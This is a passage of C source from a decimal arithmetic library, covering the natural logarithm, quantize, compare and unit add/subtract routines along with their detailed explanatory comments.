30629, 29777, 28945, 28129, 27329, 26545, 25777, 25021, 24281, 23553, 22837, 22137, 21445, 20769, 20101, 19445, 18801, 18165, 17541, 16925, 16321, 15721, 15133, 14553, 13985, 13421, 12865, 12317, 11777, 11241, 10717, 10197, 9685, 9177, 8677, 8185, 7697, 7213, 6737, 6269, 5801, 5341, 4889, 4437, 39930, 35534, 31186, 26886, 22630, 18418, 14254, 10130, 6046, 20055}; /* ------------------------------------------------------------------ */ /* decLnOp -- effect natural logarithm */ /* */ /* This computes C = ln(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. */ /* */ /* Notable cases: */ /* A<0 -> Invalid */ /* A=0 -> -Infinity (Exact) */ /* A=+Infinity -> +Infinity (Exact) */ /* A=1 exactly -> 0 (Exact) */ /* */ /* Restrictions (as for Exp): */ /* */ /* digits, emax, and -emin in the context must be less than */ /* DEC_MAX_MATH+11 (1000010), and the rhs must be within these */ /* bounds or a zero. This is an internal routine, so these */ /* restrictions are contractual and not enforced. */ /* */ /* A finite result is rounded using DEC_ROUND_HALF_EVEN; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* ------------------------------------------------------------------ */ /* The result is calculated using Newton's method, with each */ /* iteration calculating a' = a + x * exp(-a) - 1. See, for example, */ /* Epperson 1989. */ /* */ /* The iteration ends when the adjustment x*exp(-a)-1 is tiny enough. */ /* This has to be calculated at the sum of the precision of x and the */ /* working precision. */ /* */ /* Implementation notes: */ /* */ /* 1. This is separated out as decLnOp so it can be called from */ /* other Mathematical functions (e.g., Log 10) with a wider range */ /* than normal. In particular, it can handle the slightly wider */ /* (+9+2) range needed by a power function. */ /* */ /* 2. The speed of this function is about 10x slower than exp, as */ /* it typically needs 4-6 iterations for short numbers, and the */ /* extra precision needed adds a squaring effect, twice. */ /* */ /* 3. Fastpaths are included for ln(10) and ln(2), up to length 40, */ /* as these are common requests. ln(10) is used by log10(x). */ /* */ /* 4. An iteration might be saved by widening the LNnn table, and */ /* would certainly save at least one if it were made ten times */ /* bigger, too (for truncated fractions 0.100 through 0.999). */ /* However, for most practical evaluations, at least four or five */ /* iterations will be neede -- so this would only speed up by */ /* 20-25% and that probably does not justify increasing the table */ /* size. */ /* */ /* 5. The static buffers are larger than might be expected to allow */ /* for calls from decNumberPower. */ /* ------------------------------------------------------------------ */ static decNumber *decLnOp(decNumber *res, const decNumber *rhs, decContext *set, uInt *status) { uInt ignore=0; /* working status accumulator */ uInt needbytes; /* for space calculations */ Int residue; /* rounding residue */ Int r; /* rhs=f*10**r [see below] */ Int p; /* working precision */ Int pp; /* precision for iteration */ Int t; /* work */ /* buffers for a (accumulator, typically precision+2) and b */ /* (adjustment calculator, same size) */ decNumber bufa[D2N(DECBUFFER+12)]; decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber *a=bufa; /* accumulator/work */ decNumber bufb[D2N(DECBUFFER*2+2)]; decNumber *allocbufb=NULL; /* -> allocated bufa, iff allocated */ decNumber *b=bufb; /* adjustment/work */ decNumber numone; /* constant 1 */ decNumber cmp; /* work */ decContext aset, bset; /* working contexts */ #if DECCHECK Int iterations=0; /* for later sanity check */ if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif do { /* protect allocated storage */ if (SPECIALARG) { /* handle infinities and NaNs */ if (decNumberIsInfinite(rhs)) { /* an infinity */ if (decNumberIsNegative(rhs)) /* -Infinity -> error */ *status|=DEC_Invalid_operation; else decNumberCopy(res, rhs); /* +Infinity -> self */ } else decNaNs(res, rhs, NULL, set, status); /* a NaN */ break;} if (ISZERO(rhs)) { /* +/- zeros -> -Infinity */ decNumberZero(res); /* make clean */ res->bits=DECINF|DECNEG; /* set - infinity */ break;} /* [no status to set] */ /* Non-zero negatives are bad... */ if (decNumberIsNegative(rhs)) { /* -x -> error */ *status|=DEC_Invalid_operation; break;} /* Here, rhs is positive, finite, and in range */ /* lookaside fastpath code for ln(2) and ln(10) at common lengths */ if (rhs->exponent==0 && set->digits<=40) { #if DECDPUN==1 if (rhs->lsu[0]==0 && rhs->lsu[1]==1 && rhs->digits==2) { /* ln(10) */ #else if (rhs->lsu[0]==10 && rhs->digits==2) { /* ln(10) */ #endif aset=*set; aset.round=DEC_ROUND_HALF_EVEN; #define LN10 "2.302585092994045684017991454684364207601" decNumberFromString(res, LN10, &aset); *status|=(DEC_Inexact | DEC_Rounded); /* is inexact */ break;} if (rhs->lsu[0]==2 && rhs->digits==1) { /* ln(2) */ aset=*set; aset.round=DEC_ROUND_HALF_EVEN; #define LN2 "0.6931471805599453094172321214581765680755" decNumberFromString(res, LN2, &aset); *status|=(DEC_Inexact | DEC_Rounded); break;} } /* integer and short */ /* Determine the working precision. This is normally the */ /* requested precision + 2, with a minimum of 9. However, if */ /* the rhs is 'over-precise' then allow for all its digits to */ /* potentially participate (consider an rhs where all the excess */ /* digits are 9s) so in this case use rhs->digits+2. */ p=MAXI(rhs->digits, MAXI(set->digits, 7))+2; /* Allocate space for the accumulator and the high-precision */ /* adjustment calculator, if necessary. The accumulator must */ /* be able to hold p digits, and the adjustment up to */ /* rhs->digits+p digits. They are also made big enough for 16 */ /* digits so that they can be used for calculating the initial */ /* estimate. */ needbytes=sizeof(decNumber)+(D2U(MAXI(p,16))-1)*sizeof(Unit); if (needbytes>sizeof(bufa)) { /* need malloc space */ allocbufa=(decNumber *)malloc(needbytes); if (allocbufa==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} a=allocbufa; /* use the allocated space */ } pp=p+rhs->digits; needbytes=sizeof(decNumber)+(D2U(MAXI(pp,16))-1)*sizeof(Unit); if (needbytes>sizeof(bufb)) { /* need malloc space */ allocbufb=(decNumber *)malloc(needbytes); if (allocbufb==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} b=allocbufb; /* use the allocated space */ } /* Prepare an initial estimate in acc. Calculate this by */ /* considering the coefficient of x to be a normalized fraction, */ /* f, with the decimal point at far left and multiplied by */ /* 10**r. Then, rhs=f*10**r and 0.1<=f<1, and */ /* ln(x) = ln(f) + ln(10)*r */ /* Get the initial estimate for ln(f) from a small lookup */ /* table (see above) indexed by the first two digits of f, */ /* truncated. */ decContextDefault(&aset, DEC_INIT_DECIMAL64); /* 16-digit extended */ r=rhs->exponent+rhs->digits; /* 'normalised' exponent */ decNumberFromInt32(a, r); /* a=r */ decNumberFromInt32(b, 2302585); /* b=ln(10) (2.302585) */ b->exponent=-6; /* .. */ decMultiplyOp(a, a, b, &aset, &ignore); /* a=a*b */ /* now get top two digits of rhs into b by simple truncate and */ /* force to integer */ residue=0; /* (no residue) */ aset.digits=2; aset.round=DEC_ROUND_DOWN; decCopyFit(b, rhs, &aset, &residue, &ignore); /* copy & shorten */ b->exponent=0; /* make integer */ t=decGetInt(b); /* [cannot fail] */ if (t<10) t=X10(t); /* adjust single-digit b */ t=LNnn[t-10]; /* look up ln(b) */ decNumberFromInt32(b, t>>2); /* b=ln(b) coefficient */ b->exponent=-(t&3)-3; /* set exponent */ b->bits=DECNEG; /* ln(0.10)->ln(0.99) always -ve */ aset.digits=16; aset.round=DEC_ROUND_HALF_EVEN; /* restore */ decAddOp(a, a, b, &aset, 0, &ignore); /* acc=a+b */ /* the initial estimate is now in a, with up to 4 digits correct. */ /* When rhs is at or near Nmax the estimate will be low, so we */ /* will approach it from below, avoiding overflow when calling exp. */ decNumberZero(&numone); *numone.lsu=1; /* constant 1 for adjustment */ /* accumulator bounds are as requested (could underflow, but */ /* cannot overflow) */ aset.emax=set->emax; aset.emin=set->emin; aset.clamp=0; /* no concrete format */ /* set up a context to be used for the multiply and subtract */ bset=aset; bset.emax=DEC_MAX_MATH*2; /* use double bounds for the */ bset.emin=-DEC_MAX_MATH*2; /* adjustment calculation */ /* [see decExpOp call below] */ /* for each iteration double the number of digits to calculate, */ /* up to a maximum of p */ pp=9; /* initial precision */ /* [initially 9 as then the sequence starts 7+2, 16+2, and */ /* 34+2, which is ideal for standard-sized numbers] */ aset.digits=pp; /* working context */ bset.digits=pp+rhs->digits; /* wider context */ for (;;) { /* iterate */ #if DECCHECK iterations++; if (iterations>24) break; /* consider 9 * 2**24 */ #endif /* calculate the adjustment (exp(-a)*x-1) into b. This is a */ /* catastrophic subtraction but it really is the difference */ /* from 1 that is of interest. */ /* Use the internal entry point to Exp as it allows the double */ /* range for calculating exp(-a) when a is the tiniest subnormal. */ a->bits^=DECNEG; /* make -a */ decExpOp(b, a, &bset, &ignore); /* b=exp(-a) */ a->bits^=DECNEG; /* restore sign of a */ /* now multiply by rhs and subtract 1, at the wider precision */ decMultiplyOp(b, b, rhs, &bset, &ignore); /* b=b*rhs */ decAddOp(b, b, &numone, &bset, DECNEG, &ignore); /* b=b-1 */ /* the iteration ends when the adjustment cannot affect the */ /* result by >=0.5 ulp (at the requested digits), which */ /* is when its value is smaller than the accumulator by */ /* set->digits+1 digits (or it is zero) -- this is a looser */ /* requirement than for Exp because all that happens to the */ /* accumulator after this is the final rounding (but note that */ /* there must also be full precision in a, or a=0). */ if (decNumberIsZero(b) || (a->digits+a->exponent)>=(b->digits+b->exponent+set->digits+1)) { if (a->digits==p) break; if (decNumberIsZero(a)) { decCompareOp(&cmp, rhs, &numone, &aset, COMPARE, &ignore); /* rhs=1 ? */ if (cmp.lsu[0]==0) a->exponent=0; /* yes, exact 0 */ else *status|=(DEC_Inexact | DEC_Rounded); /* no, inexact */ break; } /* force padding if adjustment has gone to 0 before full length */ if (decNumberIsZero(b)) b->exponent=a->exponent-p; } /* not done yet ... */ decAddOp(a, a, b, &aset, 0, &ignore); /* a=a+b for next estimate */ if (pp==p) continue; /* precision is at maximum */ /* lengthen the next calculation */ pp=pp*2; /* double precision */ if (pp>p) pp=p; /* clamp to maximum */ aset.digits=pp; /* working context */ bset.digits=pp+rhs->digits; /* wider context */ } /* Newton's iteration */ #if DECCHECK /* just a sanity check; remove the test to show always */ if (iterations>24) printf("Ln iterations=%ld, status=%08lx, p=%ld, d=%ld\n", iterations, *status, p, rhs->digits); #endif /* Copy and round the result to res */ residue=1; /* indicate dirt to right */ if (ISZERO(a)) residue=0; /* .. unless underflowed to 0 */ aset.digits=set->digits; /* [use default rounding] */ decCopyFit(res, a, &aset, &residue, status); /* copy & shorten */ decFinish(res, set, &residue, status); /* cleanup/set flags */ } while(0); /* end protected */ if (allocbufa!=NULL) free(allocbufa); /* drop any storage used */ if (allocbufb!=NULL) free(allocbufb); /* .. */ /* [status is handled by caller] */ return res; } /* decLnOp */ /* ------------------------------------------------------------------ */ /* decQuantizeOp -- force exponent to requested value */ /* */ /* This computes C = op(A, B), where op adjusts the coefficient */ /* of C (by rounding or shifting) such that the exponent (-scale) */ /* of C has the value B or matches the exponent of B. */ /* The numerical value of C will equal A, except for the effects of */ /* any rounding that occurred. */ /* */ /* res is C, the result. C may be A or B */ /* lhs is A, the number to adjust */ /* rhs is B, the requested exponent */ /* set is the context */ /* quant is 1 for quantize or 0 for rescale */ /* status is the status accumulator (this can be called without */ /* risk of control loss) */ /* */ /* C must have space for set->digits digits. */ /* */ /* Unless there is an error or the result is infinite, the exponent */ /* after the operation is guaranteed to be that requested. */ /* ------------------------------------------------------------------ */ static decNumber * decQuantizeOp(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, Flag quant, uInt *status) { #if DECSUBSET decNumber *alloclhs=NULL; /* non-NULL if rounded lhs allocated */ decNumber *allocrhs=NULL; /* .., rhs */ #endif const decNumber *inrhs=rhs; /* save original rhs */ Int reqdigits=set->digits; /* requested DIGITS */ Int reqexp; /* requested exponent [-scale] */ Int residue=0; /* rounding residue */ Int etiny=set->emin-(reqdigits-1); #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set lostDigits status, as needed */ if (lhs->digits>reqdigits) { alloclhs=decRoundOperand(lhs, set, status); if (alloclhs==NULL) break; lhs=alloclhs; } if (rhs->digits>reqdigits) { /* [this only checks lostDigits] */ allocrhs=decRoundOperand(rhs, set, status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* Handle special values */ if (SPECIALARGS) { /* NaNs get usual processing */ if (SPECIALARGS & (DECSNAN | DECNAN)) decNaNs(res, lhs, rhs, set, status); /* one infinity but not both is bad */ else if ((lhs->bits ^ rhs->bits) & DECINF) *status|=DEC_Invalid_operation; /* both infinity: return lhs */ else decNumberCopy(res, lhs); /* [nop if in place] */ break; } /* set requested exponent */ if (quant) reqexp=inrhs->exponent; /* quantize -- match exponents */ else { /* rescale -- use value of rhs */ /* Original rhs must be an integer that fits and is in range, */ /* which could be from -1999999997 to +999999999, thanks to */ /* subnormals */ reqexp=decGetInt(inrhs); /* [cannot fail] */ } #if DECSUBSET if (!set->extended) etiny=set->emin; /* no subnormals */ #endif if (reqexp==BADINT /* bad (rescale only) or .. */ || reqexp==BIGODD || reqexp==BIGEVEN /* very big (ditto) or .. */ || (reqexp<etiny) /* < lowest */ || (reqexp>set->emax)) { /* > emax */ *status|=DEC_Invalid_operation; break;} /* the RHS has been processed, so it can be overwritten now if necessary */ if (ISZERO(lhs)) { /* zero coefficient unchanged */ decNumberCopy(res, lhs); /* [nop if in place] */ res->exponent=reqexp; /* .. just set exponent */ #if DECSUBSET if (!set->extended) res->bits=0; /* subset specification; no -0 */ #endif } else { /* non-zero lhs */ Int adjust=reqexp-lhs->exponent; /* digit adjustment needed */ /* if adjusted coefficient will definitely not fit, give up now */ if ((lhs->digits-adjust)>reqdigits) { *status|=DEC_Invalid_operation; break; } if (adjust>0) { /* increasing exponent */ /* this will decrease the length of the coefficient by adjust */ /* digits, and must round as it does so */ decContext workset; /* work */ workset=*set; /* clone rounding, etc. */ workset.digits=lhs->digits-adjust; /* set requested length */ /* [note that the latter can be <1, here] */ decCopyFit(res, lhs, &workset, &residue, status); /* fit to result */ decApplyRound(res, &workset, residue, status); /* .. and round */ residue=0; /* [used] */ /* If just rounded a 999s case, exponent will be off by one; */ /* adjust back (after checking space), if so. */ if (res->exponent>reqexp) { /* re-check needed, e.g., for quantize(0.9999, 0.001) under */ /* set->digits==3 */ if (res->digits==reqdigits) { /* cannot shift by 1 */ *status&=~(DEC_Inexact | DEC_Rounded); /* [clean these] */ *status|=DEC_Invalid_operation; break; } res->digits=decShiftToMost(res->lsu, res->digits, 1); /* shift */ res->exponent--; /* (re)adjust the exponent. */ } #if DECSUBSET if (ISZERO(res) && !set->extended) res->bits=0; /* subset; no -0 */ #endif } /* increase */ else /* adjust<=0 */ { /* decreasing or = exponent */ /* this will increase the length of the coefficient by -adjust */ /* digits, by adding zero or more trailing zeros; this is */ /* already checked for fit, above */ decNumberCopy(res, lhs); /* [it will fit] */ /* if padding needed (adjust<0), add it now... */ if (adjust<0) { res->digits=decShiftToMost(res->lsu, res->digits, -adjust); res->exponent+=adjust; /* adjust the exponent */ } } /* decrease */ } /* non-zero */ /* Check for overflow [do not use Finalize in this case, as an */ /* overflow here is a "don't fit" situation] */ if (res->exponent>set->emax-res->digits+1) { /* too big */ *status|=DEC_Invalid_operation; break; } else { decFinalize(res, set, &residue, status); /* set subnormal flags */ *status&=~DEC_Underflow; /* suppress Underflow [754r] */ } } while(0); /* end protected */ #if DECSUBSET if (allocrhs!=NULL) free(allocrhs); /* drop any storage used */ if (alloclhs!=NULL) free(alloclhs); /* .. */ #endif return res; } /* decQuantizeOp */ /* ------------------------------------------------------------------ */ /* decCompareOp -- compare, min, or max two Numbers */ /* */ /* This computes C = A ? B and carries out one of four operations: */ /* COMPARE -- returns the signum (as a number) giving the */ /* result of a comparison unless one or both */ /* operands is a NaN (in which case a NaN results) */ /* COMPSIG -- as COMPARE except that a quiet NaN raises */ /* Invalid operation. */ /* COMPMAX -- returns the larger of the operands, using the */ /* 754r maxnum operation */ /* COMPMAXMAG -- ditto, comparing absolute values */ /* COMPMIN -- the 754r minnum operation */ /* COMPMINMAG -- ditto, comparing absolute values */ /* COMTOTAL -- returns the signum (as a number) giving the */ /* result of a comparison using 754r total ordering */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* op is the operation flag */ /* status is the usual accumulator */ /* */ /* C must have space for one digit for COMPARE or set->digits for */ /* COMPMAX, COMPMIN, COMPMAXMAG, or COMPMINMAG. */ /* ------------------------------------------------------------------ */ /* The emphasis here is on speed for common cases, and avoiding */ /* coefficient comparison if possible. */ /* ------------------------------------------------------------------ */ static decNumber *decCompareOp(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, Flag op, uInt *status) { #if DECSUBSET decNumber *alloclhs=NULL; /* non-NULL if rounded lhs allocated */ decNumber *allocrhs=NULL; /* .., rhs */ #endif Int result=0; /* default result value */ uByte merged; /* work */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set lostDigits status, as needed */ if (lhs->digits>set->digits) { alloclhs=decRoundOperand(lhs, set, status); if (alloclhs==NULL) {result=BADINT; break;} lhs=alloclhs; } if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, status); if (allocrhs==NULL) {result=BADINT; break;} rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* If total ordering then handle differing signs 'up front' */ if (op==COMPTOTAL) { /* total ordering */ if (decNumberIsNegative(lhs) && !decNumberIsNegative(rhs)) { result=-1; break; } if (!decNumberIsNegative(lhs) && decNumberIsNegative(rhs)) { result=+1; break; } } /* handle NaNs specially; let infinities drop through */ /* This assumes sNaN (even just one) leads to NaN. */ merged=(lhs->bits | rhs->bits) & (DECSNAN | DECNAN); if (merged) { /* a NaN bit set */ if (op==COMPARE); /* result will be NaN */ else if (op==COMPSIG) /* treat qNaN as sNaN */ *status|=DEC_Invalid_operation | DEC_sNaN; else if (op==COMPTOTAL) { /* total ordering, always finite */ /* signs are known to be the same; compute the ordering here */ /* as if the signs are both positive, then invert for negatives */ if (!decNumberIsNaN(lhs)) result=-1; else if (!decNumberIsNaN(rhs)) result=+1; /* here if both NaNs */ else if (decNumberIsSNaN(lhs) && decNumberIsQNaN(rhs)) result=-1; else if (decNumberIsQNaN(lhs) && decNumberIsSNaN(rhs)) result=+1; else { /* both NaN or both sNaN */ /* now it just depends on the payload */ result=decUnitCompare(lhs->lsu, D2U(lhs->digits), rhs->lsu, D2U(rhs->digits), 0); /* [Error not possible, as these are 'aligned'] */ } /* both same NaNs */ if (decNumberIsNegative(lhs)) result=-result; break; } /* total order */ else if (merged & DECSNAN); /* sNaN -> qNaN */ else { /* here if MIN or MAX and one or two quiet NaNs */ /* min or max -- 754r rules ignore single NaN */ if (!decNumberIsNaN(lhs) || !decNumberIsNaN(rhs)) { /* just one NaN; force choice to be the non-NaN operand */ op=COMPMAX; if (lhs->bits & DECNAN) result=-1; /* pick rhs */ else result=+1; /* pick lhs */ break; } } /* max or min */ op=COMPNAN; /* use special path */ decNaNs(res, lhs, rhs, set, status); /* propagate NaN */ break; } /* have numbers */ if (op==COMPMAXMAG || op==COMPMINMAG) result=decCompare(lhs, rhs, 1); else result=decCompare(lhs, rhs, 0); /* sign matters */ } while(0); /* end protected */ if (result==BADINT) *status|=DEC_Insufficient_storage; /* rare */ else { if (op==COMPARE || op==COMPSIG ||op==COMPTOTAL) { /* returning signum */ if (op==COMPTOTAL && result==0) { /* operands are numerically equal or same NaN (and same sign, */ /* tested first); if identical, leave result 0 */ if (lhs->exponent!=rhs->exponent) { if (lhs->exponent<rhs->exponent) result=-1; else result=+1; if (decNumberIsNegative(lhs)) result=-result; } /* lexp!=rexp */ } /* total-order by exponent */ decNumberZero(res); /* [always a valid result] */ if (result!=0) { /* must be -1 or +1 */ *res->lsu=1; if (result<0) res->bits=DECNEG; } } else if (op==COMPNAN); /* special, drop through */ else { /* MAX or MIN, non-NaN result */ Int residue=0; /* rounding accumulator */ /* choose the operand for the result */ const decNumber *choice; if (result==0) { /* operands are numerically equal */ /* choose according to sign then exponent (see 754r) */ uByte slhs=(lhs->bits & DECNEG); uByte srhs=(rhs->bits & DECNEG); #if DECSUBSET if (!set->extended) { /* subset: force left-hand */ op=COMPMAX; result=+1; } else #endif if (slhs!=srhs) { /* signs differ */ if (slhs) result=-1; /* rhs is max */ else result=+1; /* lhs is max */ } else if (slhs && srhs) { /* both negative */ if (lhs->exponent<rhs->exponent) result=+1; else result=-1; /* [if equal, use lhs, technically identical] */ } else { /* both positive */ if (lhs->exponent>rhs->exponent) result=+1; else result=-1; /* [ditto] */ } } /* numerically equal */ /* here result will be non-0; reverse if looking for MIN */ if (op==COMPMIN || op==COMPMINMAG) result=-result; choice=(result>0 ? lhs : rhs); /* choose */ /* copy chosen to result, rounding if need be */ decCopyFit(res, choice, set, &residue, status); decFinish(res, set, &residue, status); } } #if DECSUBSET if (allocrhs!=NULL) free(allocrhs); /* free any storage used */ if (alloclhs!=NULL) free(alloclhs); /* .. */ #endif return res; } /* decCompareOp */ /* ------------------------------------------------------------------ */ /* decCompare -- compare two decNumbers by numerical value */ /* */ /* This routine compares A ? B without altering them. */ /* */ /* Arg1 is A, a decNumber which is not a NaN */ /* Arg2 is B, a decNumber which is not a NaN */ /* Arg3 is 1 for a sign-independent compare, 0 otherwise */ /* */ /* returns -1, 0, or 1 for A<B, A==B, or A>B, or BADINT if failure */ /* (the only possible failure is an allocation error) */ /* ------------------------------------------------------------------ */ static Int decCompare(const decNumber *lhs, const decNumber *rhs, Flag abs) { Int result; /* result value */ Int sigr; /* rhs signum */ Int compare; /* work */ result=1; /* assume signum(lhs) */ if (ISZERO(lhs)) result=0; if (abs) { if (ISZERO(rhs)) return result; /* LHS wins or both 0 */ /* RHS is non-zero */ if (result==0) return -1; /* LHS is 0; RHS wins */ /* [here, both non-zero, result=1] */ } else { /* signs matter */ if (result && decNumberIsNegative(lhs)) result=-1; sigr=1; /* compute signum(rhs) */ if (ISZERO(rhs)) sigr=0; else if (decNumberIsNegative(rhs)) sigr=-1; if (result > sigr) return +1; /* L > R, return 1 */ if (result < sigr) return -1; /* L < R, return -1 */ if (result==0) return 0; /* both 0 */ } /* signums are the same; both are non-zero */ if ((lhs->bits | rhs->bits) & DECINF) { /* one or more infinities */ if (decNumberIsInfinite(rhs)) { if (decNumberIsInfinite(lhs)) result=0;/* both infinite */ else result=-result; /* only rhs infinite */ } return result; } /* must compare the coefficients, allowing for exponents */ if (lhs->exponent>rhs->exponent) { /* LHS exponent larger */ /* swap sides, and sign */ const decNumber *temp=lhs; lhs=rhs; rhs=temp; result=-result; } compare=decUnitCompare(lhs->lsu, D2U(lhs->digits), rhs->lsu, D2U(rhs->digits), rhs->exponent-lhs->exponent); if (compare!=BADINT) compare*=result; /* comparison succeeded */ return compare; } /* decCompare */ /* ------------------------------------------------------------------ */ /* decUnitCompare -- compare two >=0 integers in Unit arrays */ /* */ /* This routine compares A ? B*10**E where A and B are unit arrays */ /* A is a plain integer */ /* B has an exponent of E (which must be non-negative) */ /* */ /* Arg1 is A first Unit (lsu) */ /* Arg2 is A length in Units */ /* Arg3 is B first Unit (lsu) */ /* Arg4 is B length in Units */ /* Arg5 is E (0 if the units are aligned) */ /* */ /* returns -1, 0, or 1 for A<B, A==B, or A>B, or BADINT if failure */ /* (the only possible failure is an allocation error, which can */ /* only occur if E!=0) */ /* ------------------------------------------------------------------ */ static Int decUnitCompare(const Unit *a, Int alength, const Unit *b, Int blength, Int exp) { Unit *acc; /* accumulator for result */ Unit accbuff[SD2U(DECBUFFER*2+1)]; /* local buffer */ Unit *allocacc=NULL; /* -> allocated acc buffer, iff allocated */ Int accunits, need; /* units in use or needed for acc */ const Unit *l, *r, *u; /* work */ Int expunits, exprem, result; /* .. */ if (exp==0) { /* aligned; fastpath */ if (alength>blength) return 1; if (alength<blength) return -1; /* same number of units in both -- need unit-by-unit compare */ l=a+alength-1; r=b+alength-1; for (;l>=a; l--, r--) { if (*l>*r) return 1; if (*l<*r) return -1; } return 0; /* all units match */ } /* aligned */ /* Unaligned. If one is >1 unit longer than the other, padded */ /* approximately, then can return easily */ if (alength>blength+(Int)D2U(exp)) return 1; if (alength+1<blength+(Int)D2U(exp)) return -1; /* Need to do a real subtract. For this, a result buffer is needed */ /* even though only the sign is of interest. Its length needs */ /* to be the larger of alength and padded blength, +2 */ need=blength+D2U(exp); /* maximum real length of B */ if (need<alength) need=alength; need+=2; acc=accbuff; /* assume use local buffer */ if (need*sizeof(Unit)>sizeof(accbuff)) { allocacc=(Unit *)malloc(need*sizeof(Unit)); if (allocacc==NULL) return BADINT; /* hopeless -- abandon */ acc=allocacc; } /* Calculate units and remainder from exponent. */ expunits=exp/DECDPUN; exprem=exp%DECDPUN; /* subtract [A+B*(-m)] */ accunits=decUnitAddSub(a, alength, b, blength, expunits, acc, -(Int)powers[exprem]); /* [UnitAddSub result may have leading zeros, even on zero] */ if (accunits<0) result=-1; /* negative result */ else { /* non-negative result */ /* check units of the result before freeing any storage */ for (u=acc; u<acc+accunits-1 && *u==0;) u++; result=(*u==0 ? 0 : +1); } /* clean up and return the result */ if (allocacc!=NULL) free(allocacc); /* drop any storage used */ return result; } /* decUnitCompare */ /* ------------------------------------------------------------------ */ /* decUnitAddSub -- add or subtract two >=0 integers in Unit arrays */ /* */ /* This routine performs the calculation: */ /* */ /* C=A+(B*M) */ /* */ /* Where M is in the range -DECDPUNMAX through +DECDPUNMAX. */ /* */ /* A may be shorter or longer than B. */ /* */ /* Leading zeros are not removed after a calculation. The result is */ /* either the same length as the longer of A and B (adding any */ /* shift), or one Unit longer than that (if a Unit carry occurred). */ /* */ /* A and B content are not altered unless C is also A or B. */ /* C may be the same array as A or B, but only if no zero padding is */ /* requested (that is, C may be B only if bshift==0). */ /* C is filled from the lsu; only those units necessary to complete */ /* the calculation are referenced. */ /* */ /* Arg1 is A first Unit (lsu) */ /* Arg2 is A length in Units */ /* Arg3 is B first Unit (lsu) */ /* Arg4 is B length in Units */ /* Arg5 is B shift in Units (>=0; pads with 0 units if positive) */ /* Arg6 is C first Unit (lsu) */ /* Arg7 is M, the multiplier */ /* */ /* returns the count of Units written to C, which will be non-zero */ /* and negated if the result is negative. That is, the sign of the */ /* returned Int is the sign of the result (positive for zero) and */ /* the absolute value of the Int is the count of Units. */ /* */ /* It is the caller's responsibility to make sure that C size is */ /* safe, allowing space if necessary for a one-Unit carry. */ /* */ /* This routine is severely performance-critical; *any* change here */ /* must be measured (timed) to assure no performance degradation. */ /* In particular, trickery here tends to be counter-productive, as */ /* increased complexity of code hurts register optimizations on */ /* register-poor architectures. Avoiding divisions is nearly */ /* always a Good Idea, however. */ /* */ /* Special thanks to Rick McGuire (IBM Cambridge, MA) and Dave Clark */ /* (IBM Warwick, UK) for some of the ideas used in this routine. */ /* ------------------------------------------------------------------ */ static Int decUnitAddSub(const Unit *a, Int alength, const Unit *b, Int blength, Int bshift, Unit *c, Int m) { const Unit *alsu=a; /* A lsu [need to remember it] */ Unit *clsu=c; /* C ditto */ Unit *minC; /* low water mark for C */ Unit *maxC; /* high water mark for C */ eInt carry=0; /* carry integer (could be Long) */ Int add; /* work */ #if DECDPUN<=4 /* myriadal, millenary, etc. */ Int est; /* estimated quotient */ #endif #if DECTRACE if (alength<1 || blength<1) printf("decUnitAddSub: alen blen m %ld %ld [%ld]\n", alength, blength, m); #endif maxC=c+alength; /* A is usually the longer */ minC=c+blength; /* .. and B the shorter */ if (bshift!=0) { /* B is shifted; low As copy across */ minC+=bshift; /* if in place [common], skip copy unless there's a gap [rare] */ if (a==c && bshift<=alength) { c+=bshift; a+=bshift; } else for (; c<clsu+bshift; a++, c++) { /* copy needed */ if (a<alsu+alength) *c=*a; else *c=0; } } if (minC>maxC) { /* swap */ Unit *hold=minC; minC=maxC; maxC=hold; } /* For speed, do the addition as two loops; the first where both A */ /* and B contribute, and the second (if necessary) where only one or */ /* other of the numbers contribute. */ /* Carry handling is the same (i.e., duplicated) in each case. */ for (; c<minC; c++) { carry+=*a; a++; carry+=((eInt)*b)*m; /* [special-casing m=1/-1 */ b++; /* here is not a win] */ /* here carry is new Unit of digits; it could be +ve or -ve */ if ((ueInt)carry<=DECDPUNMAX) { /* fastpath 0-DECDPUNMAX */ *c=(Unit)carry; carry=0; continue; } #if DECDPUN==4 /* use divide-by-multiply */ if (carry>=0) { est=(((ueInt)carry>>11)*53687)>>18; *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* likely quotient [89%] */ if (*c<DECDPUNMAX+1) continue; /* estimate was correct */ carry++; *c-=DECDPUNMAX+1; continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=(((ueInt)carry>>11)*53687)>>18; *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ if (*c<DECDPUNMAX+1) continue; /* was OK */ carry++; *c-=DECDPUNMAX+1; #elif DECDPUN==3 if (carry>=0) { est=(((ueInt)carry>>3)*16777)>>21; *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* likely quotient [99%] */ if (*c<DECDPUNMAX+1) continue; /* estimate was correct */ carry++; *c-=DECDPUNMAX+1; continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=(((ueInt)carry>>3)*16777)>>21; *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ if (*c<DECDPUNMAX+1) continue; /* was OK */ carry++; 